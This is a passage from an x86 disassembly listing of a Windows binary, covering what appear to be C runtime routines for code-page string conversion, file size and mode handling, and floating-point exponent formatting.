
; Attributes: bp-based frame


sub_4108B7	proc near		; CODE XREF: sub_40C517+285p
					; sub_40C517+336p ...

var_34		= dword	ptr -34h
var_30		= dword	ptr -30h
var_2C		= dword	ptr -2Ch
var_28		= dword	ptr -28h
var_24		= dword	ptr -24h
var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 34h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		mov	eax, [ebp+arg_8]
		mov	ecx, [ebp+arg_10]
		mov	[ebp+var_28], eax
		mov	eax, [ebp+arg_C]
		push	ebx
		mov	[ebp+var_30], eax
		mov	eax, [eax]
		push	esi
		mov	[ebp+var_24], eax
		mov	eax, [ebp+arg_0]
		push	edi
		xor	edi, edi
		cmp	eax, [ebp+arg_4]
		mov	[ebp+var_34], ecx
		mov	[ebp+var_20], edi
		mov	[ebp+var_2C], edi
		jz	loc_410A54
		mov	esi, ds:dword_41E1B4
		lea	ecx, [ebp+var_18]
		push	ecx
		push	eax
		call	esi	; GetCPInfo
		test	eax, eax
		mov	ebx, ds:dword_41E0A0
		jz	short loc_41096A
		cmp	[ebp+var_18], 1
		jnz	short loc_41096A
		lea	eax, [ebp+var_18]
		push	eax
		push	[ebp+arg_4]
		call	esi	; GetCPInfo
		test	eax, eax
		jz	short loc_41096A
		cmp	[ebp+var_18], 1
		jnz	short loc_41096A
		mov	esi, [ebp+var_24]
		cmp	esi, 0FFFFFFFFh
		mov	[ebp+var_2C], 1
		jnz	short loc_410940
		push	[ebp+var_28]
		call	sub_4046F0
		mov	esi, eax
		pop	ecx
		inc	esi

loc_410940:				; CODE XREF: sub_4108B7+7Bj
		cmp	esi, edi

loc_410942:				; CODE XREF: sub_4108B7+C6j
		jle	short loc_41099F
		cmp	esi, 7FFFFFF0h
		ja	short loc_41099F
		lea	eax, [esi+esi+8]
		cmp	eax, 400h
		ja	short loc_410986
		call	sub_410A70
		mov	eax, esp
		cmp	eax, edi
		jz	short loc_41099A
		mov	dword ptr [eax], 0CCCCh
		jmp	short loc_410997
; ---------------------------------------------------------------------------

loc_41096A:				; CODE XREF: sub_4108B7+53j
					; sub_4108B7+59j ...
		push	edi
		push	edi
		push	[ebp+var_24]
		push	[ebp+var_28]
		push	1
		push	[ebp+arg_0]
		call	ebx	; MultiByteToWideChar
		mov	esi, eax
		cmp	esi, edi
		jnz	short loc_410942

loc_41097F:				; CODE XREF: sub_4108B7+EEj
		xor	eax, eax
		jmp	loc_410A57
; ---------------------------------------------------------------------------

loc_410986:				; CODE XREF: sub_4108B7+9Ej
		push	eax
		call	sub_403C6E
		cmp	eax, edi
		pop	ecx
		jz	short loc_41099A
		mov	dword ptr [eax], 0DDDDh

loc_410997:				; CODE XREF: sub_4108B7+B1j
		add	eax, 8

loc_41099A:				; CODE XREF: sub_4108B7+A9j
					; sub_4108B7+D8j
		mov	[ebp+var_1C], eax
		jmp	short loc_4109A2
; ---------------------------------------------------------------------------

loc_41099F:				; CODE XREF: sub_4108B7:loc_410942j
					; sub_4108B7+93j
		mov	[ebp+var_1C], edi

loc_4109A2:				; CODE XREF: sub_4108B7+E6j
		cmp	[ebp+var_1C], edi
		jz	short loc_41097F
		lea	eax, [esi+esi]
		push	eax
		push	edi
		push	[ebp+var_1C]
		call	sub_408130
		add	esp, 0Ch
		push	esi
		push	[ebp+var_1C]
		push	[ebp+var_24]
		push	[ebp+var_28]
		push	1
		push	[ebp+arg_0]
		call	ebx	; MultiByteToWideChar
		test	eax, eax
		jz	short loc_410A4B
		mov	ebx, [ebp+var_34]
		cmp	ebx, edi
		jz	short loc_4109F0
		push	edi
		push	edi
		push	[ebp+arg_14]
		push	ebx
		push	esi
		push	[ebp+var_1C]
		push	edi
		push	[ebp+arg_4]
		call	ds:dword_41E134	; WideCharToMultiByte
		test	eax, eax
		jz	short loc_410A4B
		mov	[ebp+var_20], ebx
		jmp	short loc_410A4B
; ---------------------------------------------------------------------------

loc_4109F0:				; CODE XREF: sub_4108B7+11Aj
		cmp	[ebp+var_2C], edi
		mov	ebx, ds:dword_41E134
		jnz	short loc_410A0F
		push	edi
		push	edi
		push	edi
		push	edi
		push	esi
		push	[ebp+var_1C]
		push	edi
		push	[ebp+arg_4]
		call	ebx	; WideCharToMultiByte
		mov	esi, eax
		cmp	esi, edi
		jz	short loc_410A4B

loc_410A0F:				; CODE XREF: sub_4108B7+142j
		push	esi
		push	1
		call	sub_407D3A
		cmp	eax, edi
		pop	ecx
		pop	ecx
		mov	[ebp+var_20], eax
		jz	short loc_410A4B
		push	edi
		push	edi
		push	esi
		push	eax
		push	esi
		push	[ebp+var_1C]
		push	edi
		push	[ebp+arg_4]
		call	ebx	; WideCharToMultiByte
		cmp	eax, edi
		jnz	short loc_410A40
		push	[ebp+var_20]
		call	sub_403B91
		pop	ecx
		mov	[ebp+var_20], edi
		jmp	short loc_410A4B
; ---------------------------------------------------------------------------

loc_410A40:				; CODE XREF: sub_4108B7+179j
		cmp	[ebp+var_24], 0FFFFFFFFh
		jz	short loc_410A4B
		mov	ecx, [ebp+var_30]
		mov	[ecx], eax

loc_410A4B:				; CODE XREF: sub_4108B7+113j
					; sub_4108B7+132j ...
		push	[ebp+var_1C]
		call	sub_40C4FC
		pop	ecx

loc_410A54:				; CODE XREF: sub_4108B7+38j
		mov	eax, [ebp+var_20]

loc_410A57:				; CODE XREF: sub_4108B7+CAj
		lea	esp, [ebp-40h]
		pop	edi
		pop	esi
		pop	ebx
		mov	ecx, [ebp+var_4]
		xor	ecx, ebp
		call	sub_402C9E
		leave
		retn
sub_4108B7	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_410A70	proc near		; CODE XREF: sub_40C517+F3p
					; sub_40C517+1B1p ...

arg_0		= byte ptr  4

		push	ecx
		lea	ecx, [esp+4+arg_0]
		sub	ecx, eax
		and	ecx, 0Fh
		add	eax, ecx
		sbb	ecx, ecx
		or	eax, ecx
		pop	ecx
		jmp	sub_4119C0
sub_410A70	endp

; ---------------------------------------------------------------------------
		push	ecx
		lea	ecx, [esp+8]
		sub	ecx, eax
		and	ecx, 7
		add	eax, ecx
		sbb	ecx, ecx
		or	eax, ecx
		pop	ecx
		jmp	sub_4119C0

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_410A9C	proc near		; CODE XREF: sub_40D41A+2A1p
					; sub_40D41A+2C1p

var_10		= byte ptr -10h
var_C		= byte ptr -0Ch
var_4		= dword	ptr -4
arg_0		= word ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	esi
		xor	esi, esi
		cmp	dword_425218, esi
		jz	short loc_410B05
		cmp	dword_425224, 0FFFFFFFEh
		jnz	short loc_410AC5
		call	sub_4119EB

loc_410AC5:				; CODE XREF: sub_410A9C+22j
		mov	eax, dword_425224
		cmp	eax, 0FFFFFFFFh
		jnz	short loc_410AD5

loc_410ACF:				; CODE XREF: sub_410A9C+56j
					; sub_410A9C+61j ...
		or	ax, 0FFFFh
		jmp	short loc_410B45
; ---------------------------------------------------------------------------

loc_410AD5:				; CODE XREF: sub_410A9C+31j
		push	esi
		lea	ecx, [ebp+var_10]
		push	ecx
		push	1
		lea	ecx, [ebp+arg_0]
		push	ecx
		push	eax
		call	ds:off_41E0A8
		test	eax, eax
		jnz	short loc_410B52
		cmp	dword_425218, 2
		jnz	short loc_410ACF
		call	ds:dword_41E0EC	; RtlGetLastWin32Error
		cmp	eax, 78h
		jnz	short loc_410ACF
		mov	dword_425218, esi

loc_410B05:				; CODE XREF: sub_410A9C+19j
		push	esi
		push	esi
		push	5
		lea	eax, [ebp+var_C]
		push	eax
		push	1
		lea	eax, [ebp+arg_0]
		push	eax
		push	esi
		call	ds:off_41E0AC
		push	eax
		call	ds:dword_41E134	; WideCharToMultiByte
		mov	ecx, dword_425224
		cmp	ecx, 0FFFFFFFFh
		jz	short loc_410ACF
		push	esi
		lea	edx, [ebp+var_10]
		push	edx
		push	eax
		lea	eax, [ebp+var_C]
		push	eax
		push	ecx
		call	ds:off_41E0B0
		test	eax, eax
		jz	short loc_410ACF

loc_410B41:				; CODE XREF: sub_410A9C+C0j
		mov	ax, [ebp+arg_0]

loc_410B45:				; CODE XREF: sub_410A9C+37j
		mov	ecx, [ebp+var_4]
		xor	ecx, ebp
		pop	esi
		call	sub_402C9E
		leave
		retn
; ---------------------------------------------------------------------------

loc_410B52:				; CODE XREF: sub_410A9C+4Dj
		mov	dword_425218, 1
		jmp	short loc_410B41
sub_410A9C	endp

; ---------------------------------------------------------------------------
		push	2
		call	sub_407E1D
		pop	ecx
		retn

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_410B67	proc near		; CODE XREF: sub_40E632+36Fp

var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		sub	esp, 18h
		push	ebx
		push	esi
		push	edi
		xor	ebx, ebx
		push	1
		push	ebx
		push	ebx
		push	[ebp+arg_0]
		mov	[ebp+var_10], ebx
		mov	[ebp+var_C], ebx
		call	sub_40D27E
		mov	[ebp+var_18], eax
		and	eax, edx
		add	esp, 10h
		cmp	eax, 0FFFFFFFFh
		mov	[ebp+var_14], edx
		jz	short loc_410BED
		push	2
		push	ebx
		push	ebx
		push	[ebp+arg_0]
		call	sub_40D27E
		mov	ecx, eax
		and	ecx, edx
		add	esp, 10h
		cmp	ecx, 0FFFFFFFFh
		jz	short loc_410BED
		mov	esi, [ebp+arg_4]
		mov	edi, [ebp+arg_8]
		sub	esi, eax
		sbb	edi, edx
		js	loc_410C82
		jg	short loc_410BC6
		cmp	esi, ebx
		jbe	loc_410C82

loc_410BC6:				; CODE XREF: sub_410B67+55j
		mov	ebx, 1000h
		push	ebx
		push	8
		call	ds:dword_41E0FC	; GetProcessHeap
		push	eax
		call	ds:dword_41E110	; RtlAllocateHeap
		test	eax, eax
		mov	[ebp+var_4], eax
		jnz	short loc_410BF9
		call	sub_405D93
		mov	dword ptr [eax], 0Ch

loc_410BED:				; CODE XREF: sub_410B67+2Bj
					; sub_410B67+43j ...
		call	sub_405D93
		mov	eax, [eax]

loc_410BF4:				; CODE XREF: sub_410B67+1AFj
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
; ---------------------------------------------------------------------------

loc_410BF9:				; CODE XREF: sub_410B67+79j
		push	8000h
		push	[ebp+arg_0]
		call	sub_410D8D
		pop	ecx
		pop	ecx
		mov	[ebp+var_8], eax

loc_410C0B:				; CODE XREF: sub_410B67+CFj
					; sub_410B67+D3j
		test	edi, edi
		jl	short loc_410C19
		jg	short loc_410C15
		cmp	esi, ebx
		jb	short loc_410C19

loc_410C15:				; CODE XREF: sub_410B67+A8j
		mov	eax, ebx
		jmp	short loc_410C1B
; ---------------------------------------------------------------------------

loc_410C19:				; CODE XREF: sub_410B67+A6j
					; sub_410B67+ACj
		mov	eax, esi

loc_410C1B:				; CODE XREF: sub_410B67+B0j
		push	eax
		push	[ebp+var_4]
		push	[ebp+arg_0]
		call	sub_40D41A
		add	esp, 0Ch
		cmp	eax, 0FFFFFFFFh
		jz	short loc_410C65
		cdq
		sub	esi, eax
		sbb	edi, edx
		js	short loc_410C3C
		jg	short loc_410C0B
		test	esi, esi
		ja	short loc_410C0B

loc_410C3C:				; CODE XREF: sub_410B67+CDj
		mov	esi, [ebp+var_10]

loc_410C3F:				; CODE XREF: sub_410B67+119j
		push	[ebp+var_8]
		push	[ebp+arg_0]
		call	sub_410D8D
		pop	ecx
		pop	ecx
		push	[ebp+var_4]
		push	0
		call	ds:dword_41E0FC	; GetProcessHeap
		push	eax
		call	ds:dword_41E108	; RtlFreeHeap
		xor	ebx, ebx
		jmp	loc_410CEB
; ---------------------------------------------------------------------------

loc_410C65:				; CODE XREF: sub_410B67+C6j
		call	sub_405DA6
		cmp	dword ptr [eax], 5
		jnz	short loc_410C7A
		call	sub_405D93
		mov	dword ptr [eax], 0Dh

loc_410C7A:				; CODE XREF: sub_410B67+106j
		or	esi, 0FFFFFFFFh
		mov	[ebp+var_C], esi
		jmp	short loc_410C3F
; ---------------------------------------------------------------------------

loc_410C82:				; CODE XREF: sub_410B67+4Fj
					; sub_410B67+59j
		cmp	edi, ebx
		jg	short loc_410CF7
		jl	short loc_410C8C
		cmp	esi, ebx
		jnb	short loc_410CF7

loc_410C8C:				; CODE XREF: sub_410B67+11Fj
		push	ebx
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	sub_40D27E
		and	eax, edx
		add	esp, 10h
		cmp	eax, 0FFFFFFFFh
		jz	loc_410BED
		push	[ebp+arg_0]
		call	sub_40F33D
		pop	ecx
		push	eax
		call	ds:off_41E0A4
		neg	eax
		sbb	eax, eax
		neg	eax
		dec	eax
		cdq
		mov	[ebp+var_10], eax
		and	eax, edx
		cmp	eax, 0FFFFFFFFh
		mov	[ebp+var_C], edx
		jnz	short loc_410CF7
		call	sub_405D93
		mov	dword ptr [eax], 0Dh
		call	sub_405DA6
		mov	esi, eax
		call	ds:dword_41E0EC	; RtlGetLastWin32Error
		mov	[esi], eax
		mov	esi, [ebp+var_10]

loc_410CEB:				; CODE XREF: sub_410B67+F9j
		and	esi, [ebp+var_C]
		cmp	esi, 0FFFFFFFFh
		jz	loc_410BED

loc_410CF7:				; CODE XREF: sub_410B67+11Dj
					; sub_410B67+123j ...
		push	ebx
		push	[ebp+var_14]
		push	[ebp+var_18]
		push	[ebp+arg_0]
		call	sub_40D27E
		and	eax, edx
		add	esp, 10h
		cmp	eax, 0FFFFFFFFh
		jz	loc_410BED
		xor	eax, eax
		jmp	loc_410BF4
sub_410B67	endp


; =============== S U B	R O U T	I N E =======================================



sub_410D1B	proc near		; CODE XREF: sub_40E632+322p
					; sub_40E632+37Fp ...

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

		push	esi
		mov	esi, [esp+4+arg_0]
		push	esi
		call	sub_40F33D
		cmp	eax, 0FFFFFFFFh
		pop	ecx
		jnz	short loc_410D3C
		call	sub_405D93
		mov	dword ptr [eax], 9
		or	eax, 0FFFFFFFFh
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_410D3C:				; CODE XREF: sub_410D1B+Fj
		push	edi
		push	[esp+8+arg_8]
		push	0
		push	[esp+10h+arg_4]
		push	eax
		call	ds:off_41E074
		mov	edi, eax
		cmp	edi, 0FFFFFFFFh
		jnz	short loc_410D5D
		call	ds:dword_41E0EC	; RtlGetLastWin32Error
		jmp	short loc_410D5F
; ---------------------------------------------------------------------------

loc_410D5D:				; CODE XREF: sub_410D1B+38j
		xor	eax, eax

loc_410D5F:				; CODE XREF: sub_410D1B+40j
		test	eax, eax
		jz	short loc_410D6F
		push	eax
		call	sub_405DB9
		pop	ecx
		or	eax, 0FFFFFFFFh
		jmp	short loc_410D8A
; ---------------------------------------------------------------------------

loc_410D6F:				; CODE XREF: sub_410D1B+46j
		mov	eax, esi
		and	esi, 1Fh
		imul	esi, 28h
		sar	eax, 5
		mov	eax, dword_437EC0[eax*4]
		lea	eax, [eax+esi+4]
		and	byte ptr [eax],	0FDh
		mov	eax, edi

loc_410D8A:				; CODE XREF: sub_410D1B+52j
		pop	edi
		pop	esi
		retn
sub_410D1B	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_410D8D	proc near		; CODE XREF: sub_410B67+9Ap
					; sub_410B67+DEp

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		mov	edx, [ebp+arg_0]
		mov	eax, edx
		sar	eax, 5
		and	edx, 1Fh
		imul	edx, 28h
		push	ebx
		mov	ebx, [ebp+arg_4]
		push	esi
		lea	esi, ds:437EC0h[eax*4]
		mov	eax, [esi]
		lea	ecx, [eax+edx]
		movzx	eax, byte ptr [ecx+4]
		and	eax, 80h
		mov	[ebp+arg_0], eax
		mov	al, [ecx+24h]
		add	al, al
		movsx	eax, al
		push	edi
		mov	edi, 4000h
		sar	eax, 1
		cmp	ebx, edi
		jz	short loc_410E1F
		cmp	ebx, 8000h
		jz	short loc_410E19
		cmp	ebx, 10000h
		jz	short loc_410E05
		cmp	ebx, 20000h
		jz	short loc_410E05
		cmp	ebx, 40000h
		jnz	short loc_410E2C
		or	byte ptr [ecx+4], 80h
		mov	ecx, [esi]
		lea	ecx, [ecx+edx+24h]
		mov	dl, [ecx]
		and	dl, 81h
		or	dl, 1

loc_410E01:				; CODE XREF: sub_410D8D+8Aj
		mov	[ecx], dl
		jmp	short loc_410E2C
; ---------------------------------------------------------------------------

loc_410E05:				; CODE XREF: sub_410D8D+50j
					; sub_410D8D+58j
		or	byte ptr [ecx+4], 80h
		mov	ecx, [esi]
		lea	ecx, [ecx+edx+24h]
		mov	dl, [ecx]
		and	dl, 82h
		or	dl, 2
		jmp	short loc_410E01
; ---------------------------------------------------------------------------

loc_410E19:				; CODE XREF: sub_410D8D+48j
		and	byte ptr [ecx+4], 7Fh
		jmp	short loc_410E2C
; ---------------------------------------------------------------------------

loc_410E1F:				; CODE XREF: sub_410D8D+40j
		or	byte ptr [ecx+4], 80h
		mov	ecx, [esi]
		lea	ecx, [ecx+edx+24h]
		and	byte ptr [ecx],	80h

loc_410E2C:				; CODE XREF: sub_410D8D+60j
					; sub_410D8D+76j ...
		cmp	[ebp+arg_0], 0
		jnz	short loc_410E39
		mov	eax, 8000h
		jmp	short loc_410E44
; ---------------------------------------------------------------------------

loc_410E39:				; CODE XREF: sub_410D8D+A3j
		neg	eax
		sbb	eax, eax
		and	eax, 0C000h
		add	eax, edi

loc_410E44:				; CODE XREF: sub_410D8D+AAj
		pop	edi
		pop	esi
		pop	ebx
		pop	ebp
		retn
sub_410D8D	endp


; =============== S U B	R O U T	I N E =======================================



sub_410E49	proc near		; CODE XREF: sub_40E632+40p

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		push	esi
		xor	esi, esi
		cmp	eax, esi
		jnz	short loc_410E71
		call	sub_405D93
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		push	16h
		pop	eax
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_410E71:				; CODE XREF: sub_410E49+9j
		mov	ecx, dword_429080
		mov	[eax], ecx
		xor	eax, eax
		pop	esi
		retn
sub_410E49	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_410E7D	proc near		; CODE XREF: sub_410FF8+6p
					; DATA XREF: sub_40FCCB+55o ...

var_10		= dword	ptr -10h
var_8		= dword	ptr -8
var_4		= byte ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		push	esi
		push	[ebp+arg_4]
		lea	ecx, [ebp+var_10]
		call	sub_402CAD
		mov	esi, [ebp+arg_0]
		movsx	eax, byte ptr [esi]
		push	eax
		call	sub_405D31
		cmp	eax, 65h
		jmp	short loc_410EAC
; ---------------------------------------------------------------------------

loc_410EA0:				; CODE XREF: sub_410E7D+30j
		inc	esi
		movzx	eax, byte ptr [esi]
		push	eax
		call	sub_40F73F
		test	eax, eax

loc_410EAC:				; CODE XREF: sub_410E7D+21j
		pop	ecx
		jnz	short loc_410EA0
		movsx	eax, byte ptr [esi]
		push	eax
		call	sub_405D31
		cmp	eax, 78h
		pop	ecx
		jnz	short loc_410EC0
		inc	esi
		inc	esi

loc_410EC0:				; CODE XREF: sub_410E7D+3Fj
		mov	ecx, [ebp+var_10]
		mov	ecx, [ecx+0BCh]
		mov	ecx, [ecx]
		mov	al, [esi]
		mov	cl, [ecx]
		mov	[esi], cl
		inc	esi

loc_410ED2:				; CODE XREF: sub_410E7D+60j
		mov	cl, [esi]
		mov	[esi], al
		mov	al, cl
		mov	cl, [esi]
		inc	esi
		test	cl, cl
		jnz	short loc_410ED2
		cmp	[ebp+var_4], cl
		pop	esi
		jz	short locret_410EEC
		mov	eax, [ebp+var_8]
		and	dword ptr [eax+70h], 0FFFFFFFDh

locret_410EEC:				; CODE XREF: sub_410E7D+66j
		leave
		retn
sub_410E7D	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_410EEE	proc near		; CODE XREF: sub_411006+6p
					; DATA XREF: sub_40FCCB+4Bo ...

var_10		= dword	ptr -10h
var_8		= dword	ptr -8
var_4		= byte ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		push	esi
		push	[ebp+arg_4]
		lea	ecx, [ebp+var_10]
		call	sub_402CAD
		mov	eax, [ebp+arg_0]
		mov	cl, [eax]
		test	cl, cl
		mov	esi, [ebp+var_10]
		jz	short loc_410F21
		mov	edx, [esi+0BCh]
		mov	edx, [edx]
		mov	dl, [edx]

loc_410F16:				; CODE XREF: sub_410EEE+31j
		cmp	cl, dl
		jz	short loc_410F21
		inc	eax
		mov	cl, [eax]
		test	cl, cl
		jnz	short loc_410F16

loc_410F21:				; CODE XREF: sub_410EEE+1Cj
					; sub_410EEE+2Aj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jz	short loc_410F5E
		jmp	short loc_410F35
; ---------------------------------------------------------------------------

loc_410F2A:				; CODE XREF: sub_410EEE+4Bj
		cmp	cl, 65h
		jz	short loc_410F3B
		cmp	cl, 45h
		jz	short loc_410F3B
		inc	eax

loc_410F35:				; CODE XREF: sub_410EEE+3Aj
		mov	cl, [eax]
		test	cl, cl
		jnz	short loc_410F2A

loc_410F3B:				; CODE XREF: sub_410EEE+3Fj
					; sub_410EEE+44j
		mov	edx, eax

loc_410F3D:				; CODE XREF: sub_410EEE+53j
		dec	eax
		cmp	byte ptr [eax],	30h
		jz	short loc_410F3D
		mov	ecx, [esi+0BCh]
		mov	ecx, [ecx]
		push	ebx
		mov	bl, [eax]
		cmp	bl, [ecx]
		pop	ebx
		jnz	short loc_410F54
		dec	eax

loc_410F54:				; CODE XREF: sub_410EEE+63j
					; sub_410EEE+6Ej
		mov	cl, [edx]
		inc	eax
		inc	edx
		test	cl, cl
		mov	[eax], cl
		jnz	short loc_410F54

loc_410F5E:				; CODE XREF: sub_410EEE+38j
		cmp	[ebp+var_4], 0
		pop	esi
		jz	short locret_410F6C
		mov	eax, [ebp+var_8]
		and	dword ptr [eax+70h], 0FFFFFFFDh

locret_410F6C:				; CODE XREF: sub_410EEE+75j
		leave
		retn
sub_410EEE	endp

; ---------------------------------------------------------------------------
word_410F6E	dw 0EED9h		; DATA XREF: sub_40FCCB+28o
					; .data:off_424F90o
		dd 424448Bh, 0E0DF18DCh, 7A41C4F6h, 40C03304h, 0C3C033C3h

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_410F84	proc near		; CODE XREF: sub_410FC4+Ep
					; DATA XREF: sub_40FCCB+41o ...

var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ecx
		cmp	[ebp+arg_0], 0
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		jz	short loc_410FAE
		lea	eax, [ebp+var_8]
		push	eax
		call	sub_411A6D
		mov	ecx, [ebp+var_8]
		mov	eax, [ebp+arg_4]
		mov	[eax], ecx
		mov	ecx, [ebp+var_4]
		mov	[eax+4], ecx
		jmp	short loc_410FBF
; ---------------------------------------------------------------------------

loc_410FAE:				; CODE XREF: sub_410F84+Fj
		lea	eax, [ebp+arg_0]
		push	eax
		call	sub_411B13
		mov	eax, [ebp+arg_4]
		mov	ecx, [ebp+arg_0]
		mov	[eax], ecx

loc_410FBF:				; CODE XREF: sub_410F84+28j
		add	esp, 0Ch
		leave
		retn
sub_410F84	endp


; =============== S U B	R O U T	I N E =======================================



sub_410FC4	proc near		; DATA XREF: sub_40FCCB+14o
					; .data:off_424F88o

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

		push	0
		push	[esp+4+arg_8]
		push	[esp+8+arg_4]
		push	[esp+0Ch+arg_0]
		call	sub_410F84
		add	esp, 10h
		retn
sub_410FC4	endp


; =============== S U B	R O U T	I N E =======================================



sub_410FDB	proc near		; CODE XREF: sub_411014+88p
					; sub_4115DE+8Ap ...
		test	edi, edi
		push	esi
		mov	esi, eax
		jz	short loc_410FF6
		push	esi
		call	sub_4046F0
		inc	eax
		push	eax
		push	esi
		add	esi, edi
		push	esi
		call	sub_407930
		add	esp, 10h

loc_410FF6:				; CODE XREF: sub_410FDB+5j
		pop	esi
		retn
sub_410FDB	endp


; =============== S U B	R O U T	I N E =======================================



sub_410FF8	proc near		; DATA XREF: sub_40FCCB+1Eo
					; .data:off_424F8Co

arg_0		= dword	ptr  4

		push	0
		push	[esp+4+arg_0]
		call	sub_410E7D
		pop	ecx
		pop	ecx
		retn
sub_410FF8	endp


; =============== S U B	R O U T	I N E =======================================



sub_411006	proc near		; DATA XREF: sub_40FCCB+Ao
					; .data:off_424F84o

arg_0		= dword	ptr  4

		push	0
		push	[esp+4+arg_0]
		call	sub_410EEE
		pop	ecx
		pop	ecx
		retn
sub_411006	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_411014	proc near		; CODE XREF: sub_411181+B7p
					; sub_41178C+E1p

var_10		= dword	ptr -10h
var_8		= dword	ptr -8
var_4		= byte ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= byte ptr  18h
arg_14		= dword	ptr  1Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		push	ebx
		push	esi
		push	edi
		push	[ebp+arg_14]
		lea	ecx, [ebp+var_10]
		mov	ebx, eax
		call	sub_402CAD
		xor	esi, esi
		cmp	ebx, esi
		jnz	short loc_41105B

loc_411030:				; CODE XREF: sub_411014+4Aj
		call	sub_405D93
		push	16h

loc_411037:				; CODE XREF: sub_411014+67j
		pop	edi
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		mov	[eax], edi
		call	sub_4034C7
		add	esp, 14h
		cmp	[ebp+var_4], 0
		jz	short loc_411054
		mov	eax, [ebp+var_8]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_411054:				; CODE XREF: sub_411014+37j
		mov	eax, edi
		jmp	loc_41117C
; ---------------------------------------------------------------------------

loc_41105B:				; CODE XREF: sub_411014+1Aj
		cmp	[ebp+arg_0], esi
		jbe	short loc_411030
		cmp	[ebp+arg_4], esi
		jle	short loc_41106A
		mov	eax, [ebp+arg_4]
		jmp	short loc_41106C
; ---------------------------------------------------------------------------

loc_41106A:				; CODE XREF: sub_411014+4Fj
		xor	eax, eax

loc_41106C:				; CODE XREF: sub_411014+54j
		add	eax, 9
		cmp	[ebp+arg_0], eax
		ja	short loc_41107D
		call	sub_405D93
		push	22h
		jmp	short loc_411037
; ---------------------------------------------------------------------------

loc_41107D:				; CODE XREF: sub_411014+5Ej
		cmp	[ebp+arg_10], 0
		jz	short loc_4110A1
		mov	edx, [ebp+arg_C]
		xor	eax, eax
		cmp	[ebp+arg_4], esi
		setnle	al
		xor	ecx, ecx
		cmp	dword ptr [edx], 2Dh
		setz	cl
		mov	edi, eax
		add	ecx, ebx
		mov	eax, ecx
		call	sub_410FDB

loc_4110A1:				; CODE XREF: sub_411014+6Dj
		mov	edi, [ebp+arg_C]
		cmp	dword ptr [edi], 2Dh
		mov	esi, ebx
		jnz	short loc_4110B1
		mov	byte ptr [ebx],	2Dh
		lea	esi, [ebx+1]

loc_4110B1:				; CODE XREF: sub_411014+95j
		cmp	[ebp+arg_4], 0
		jle	short loc_4110CF
		lea	eax, [esi+1]
		mov	cl, [eax]
		mov	[esi], cl
		mov	esi, eax
		mov	eax, [ebp+var_10]
		mov	eax, [eax+0BCh]
		mov	eax, [eax]
		mov	al, [eax]
		mov	[esi], al

loc_4110CF:				; CODE XREF: sub_411014+A1j
		xor	eax, eax
		cmp	[ebp+arg_10], al
		setz	al
		add	eax, [ebp+arg_4]
		add	esi, eax
		cmp	[ebp+arg_0], 0FFFFFFFFh
		jnz	short loc_4110E7
		or	ebx, 0FFFFFFFFh
		jmp	short loc_4110EC
; ---------------------------------------------------------------------------

loc_4110E7:				; CODE XREF: sub_411014+CCj
		sub	ebx, esi
		add	ebx, [ebp+arg_0]

loc_4110EC:				; CODE XREF: sub_411014+D1j
		push	offset aE000	; "e+000"
		push	ebx
		push	esi
		call	sub_407C95
		add	esp, 0Ch
		xor	ebx, ebx
		test	eax, eax
		jz	short loc_41110E
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		call	sub_4033CB
		add	esp, 14h

loc_41110E:				; CODE XREF: sub_411014+EBj
		cmp	[ebp+arg_8], ebx
		lea	ecx, [esi+2]
		jz	short loc_411119
		mov	byte ptr [esi],	45h

loc_411119:				; CODE XREF: sub_411014+100j
		mov	eax, [edi+0Ch]
		inc	esi
